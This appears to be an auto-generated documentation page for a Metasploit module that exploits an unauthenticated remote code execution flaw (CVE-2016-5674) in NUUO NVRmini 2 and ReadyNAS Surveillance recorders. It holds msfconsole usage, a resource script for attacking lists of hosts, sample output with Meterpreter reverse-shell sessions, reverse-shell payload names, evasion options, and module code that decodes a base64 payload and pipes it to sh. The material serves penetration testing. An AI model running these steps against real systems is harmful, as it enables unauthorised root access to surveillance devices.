NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/nuuo_nvrmini_unauth_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution
Module: exploit/linux/http/nuuo_nvrmini_unauth_rce
Source code: modules/exploits/linux/http/nuuo_nvrmini_unauth_rce.rb
Disclosure date: 2016-08-04
Last modification time: 2022-01-13 18:54:56 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8081, 8443, 8880, 8888
List of CVEs: CVE-2016-5674

The NVRmini 2 Network Video Recorder and the ReadyNAS Surveillance application are vulnerable to an unauthenticated remote code execution on the exposed web administration interface. This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS. This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance. It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested in those devices.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using nuuo_nvrmini_unauth_rce against a single host

Normally, you can use exploit/linux/http/nuuo_nvrmini_unauth_rce this way:

msf > use exploit/linux/http/nuuo_nvrmini_unauth_rce
msf exploit(nuuo_nvrmini_unauth_rce) > show targets
    ... a list of targets ...
msf exploit(nuuo_nvrmini_unauth_rce) > set TARGET target-id
msf exploit(nuuo_nvrmini_unauth_rce) > show options
    ... show and set options ...
msf exploit(nuuo_nvrmini_unauth_rce) > exploit

Using nuuo_nvrmini_unauth_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your nuuo_nvrmini_unauth_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/nuuo_nvrmini_unauth_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/nuuo_nvrmini_unauth_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/nuuo_nvrmini_unauth_rce

msf6 exploit(linux/http/nuuo_nvrmini_unauth_rce) > show info

       Name: NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution
     Module: exploit/linux/http/nuuo_nvrmini_unauth_rce
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-08-04

Provided by:
  Pedro Ribeiro <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   NUUO NVRmini 2
  2   ReadyNAS NETGEAR Surveillance

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8081             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Application path
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The NVRmini 2 Network Video Recorder and the ReadyNAS Surveillance 
  application are vulnerable to an unauthenticated remote code 
  execution on the exposed web administration interface. This results 
  in code execution as root in the NVRmini and the 'admin' user in 
  ReadyNAS. This exploit has been tested on several versions of the 
  NVRmini 2 and the ReadyNAS Surveillance. It probably also works on 
  the NVRsolo and other Nuuo devices, but it has not been tested in 
  those devices.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-5674
  https://www.kb.cert.org/vuls/id/856152
  https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt
  https://seclists.org/bugtraq/2016/Aug/45

Module Options


This is a complete list of options available in the linux/http/nuuo_nvrmini_unauth_rce exploit:

msf6 exploit(linux/http/nuuo_nvrmini_unauth_rce) > show options

Module options (exploit/linux/http/nuuo_nvrmini_unauth_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8081             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Application path
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/http/nuuo_nvrmini_unauth_rce exploit:

msf6 exploit(linux/http/nuuo_nvrmini_unauth_rce) > show advanced

Module advanced options (exploit/linux/http/nuuo_nvrmini_unauth_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                5                                                   no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/nuuo_nvrmini_unauth_rce module can exploit:

msf6 exploit(linux/http/nuuo_nvrmini_unauth_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   NUUO NVRmini 2
   2   ReadyNAS NETGEAR Surveillance

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/nuuo_nvrmini_unauth_rce exploit:

msf6 exploit(linux/http/nuuo_nvrmini_unauth_rce) > show payloads

Compatible Payloads
===================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1  payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   3  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   4  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   5  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   6  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   7  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   8  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/nuuo_nvrmini_unauth_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/nuuo_nvrmini_unauth_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The NVRmini 2 only supports generic or telnet payloads.


Here is a relevant code snippet related to the "The NVRmini 2 only supports generic or telnet payloads." error message:

117:	      #
118:	      # Also because of Metasploit payload limitations we cannot specify different payload constraints
119:	      # for different targets, so we use the payload raw for the NVRmini 2 and encoded for the ReadyNAS.
120:	      #
121:	      if payload.raw.include?("perl")
122:	        fail_with(Failure::Unknown, "The NVRmini 2 only supports generic or telnet payloads.")
123:	      end
124:	      payload_clean = payload.raw.gsub('>/dev/null', '').gsub('sh -c', '').gsub('"','').gsub("'",'')
125:	      if not payload_clean =~ /([\/'"]+)/
126:	        print_status("#{peer} - Executing payload...")
127:	        send_payload(payload_clean, 1)

Your payload cannot have any of the following characters: / ' "


Here is a relevant code snippet related to the "Your payload cannot have any of the following characters: / ' "" error message:

125:	      if not payload_clean =~ /([\/'"]+)/
126:	        print_status("#{peer} - Executing payload...")
127:	        send_payload(payload_clean, 1)
128:	        handler
129:	      else
130:	        fail_with(Failure::Unknown, "Your payload cannot have any of the following characters: / ' \"")
131:	      end
132:	    elsif my_target == targets[2]
133:	      #
134:	      # The ReadyNAS has less char restrictions (it only fails with forward slash) but it also
135:	      # does not have the telnet binary.

ReadyNAS Surveillance does not support telnet payloads (try openssl or perl).


Here is a relevant code snippet related to the "ReadyNAS Surveillance does not support telnet payloads (try openssl or perl)." error message:

135:	      # does not have the telnet binary.
136:	      # We also have to fix the perl payload - there's an IO import error on the ReadyNAS that blows
137:	      # it up.
138:	      #
139:	      if payload.raw.include? "telnet"
140:	        fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support telnet payloads (try openssl or perl).")
141:	      end
142:	      print_status("#{peer} - Executing payload...")
143:	      payload_clean = payload.raw.gsub("-MIO ", "-MIO::Socket ")
144:	      send_payload("echo #{Rex::Text.encode_base64(payload_clean)} | base64 -d | sh", 1)
145:	      handler

Failed to pick a target


Here is a relevant code snippet related to the "Failed to pick a target" error message:

140:	        fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support telnet payloads (try openssl or perl).")
141:	      end
142:	      print_status("#{peer} - Executing payload...")
143:	      payload_clean = payload.raw.gsub("-MIO ", "-MIO::Socket ")
144:	      send_payload("echo #{Rex::Text.encode_base64(payload_clean)} | base64 -d | sh", 1)
145:	      handler
146:	    else
147:	      fail_with(Failure::Unknown, "Failed to pick a target")
148:	    end
149:	  end
150:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Pedro Ribeiro <pedrib[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.